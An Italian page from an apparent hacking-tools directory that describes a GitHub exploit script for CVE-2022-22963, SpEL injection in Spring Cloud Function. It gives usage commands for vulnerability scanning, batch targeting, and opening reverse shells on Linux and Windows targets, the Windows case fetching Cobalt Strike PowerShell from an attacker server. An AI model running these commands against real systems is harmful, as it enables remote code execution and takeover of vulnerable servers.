Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
spring-cloud-function-rce — Vulnerabilità di iniezione di espressioni SPEL in Spring Cloud Function(CVE-2022-22963) | Kitploit
Strumenti/GitHubGitHub/k3rwin/spring-cloud-function-rce
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingCommand and Control
GitHubk3rwin/spring-cloud-function-rce

spring-cloud-function-rce

Vulnerabilità di iniezione di espressioni SPEL in Spring Cloud Function(CVE-2022-22963)

Vedi Repository
834 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Vulnerabilità di iniezione di espressioni SPEL in Spring Cloud Function (CVE-2022-22963)

Il framework Spring fornisce un modello completo di programmazione e configurazione per applicazioni aziendali moderne basate su Java (su qualsiasi tipo di piattaforma di distribuzione).

Nel framework serverless Spring Cloud Function di Spring Cloud, il metodo apply della classe RoutingFunction elabora il parametro "spring.cloud.function.routing-expression" nell'header della richiesta come espressione SpEL, causando un'iniezione di espressioni SpEL; un attaccante può eseguire codice arbitrario tramite questa vulnerabilità.

Versioni interessate: 3.0.0.RELEASE <= Spring Cloud Function <= 3.2.2

Lo script è solo a scopo di apprendimento; per qualsiasi altro utilizzo, la responsabilità legale è interamente dell'utente e non dell'autore

1.Installazione (moduli da installare)

root@kitploit:~
pip3 install -r requirements.txt	

2.Uso (utilizzo)

python3 spring-cloud-function-rce.py -h

image-20220414184058525

-u specifica un singolo URL per il test dnslog

-e specifica la modalità reverse shell

-s specifica il sistema operativo del target, predefinito linux, parametri win/linux da usare insieme ai parametri -i e -c

3.Esempi (casi d'uso)

3.1 Test di un singolo URL

python3 spring-cloud-function-rce.py -u "http://192.168.50.222:8080/"

image-20220414184202055

3.2 Test di URL in batch

python3 spring-cloud-function-rce.py -f "urls.txt"

image-20220414184424640

  • 123.58.236.76:47874 è l'ambiente docker di vulfocus; non avendo il comando nslookup installato, il test dnslog fallisce
  • Gli URL in batch devono essere la root del sito; http://192.168.50.222:8080/ è la root del lab locale, aggiungere la directory test rende il POC inefficace

3.3 GetShell sul target Linux

python3 spring-cloud-function-rce.py -u "http://192.168.50.222:8080/" -e -i "vps的ip地址:5566"

image-20220414185231029

3.4 GetShell sul target Windows

python3 spring-cloud-function-rce.py -u "http://192.168.50.222:8080/" -e -s "win" -c "http://vps/a"

-c specifica l'indirizzo del codice PowerShell generato da CS per la connessione; deve essere usato con -s "win"; l'opzione -c deve essere eseguita su Windows, lo script chiamerà PowerShell per la codifica del POC

image-20220414185711222

image-20220414190020294

4. Ambiente di test

4.1 Configurazione manuale con IDEA

Riferimento

4.2 Ambiente Docker

vulfocus

image-20220414190509578

Scarica lo strumento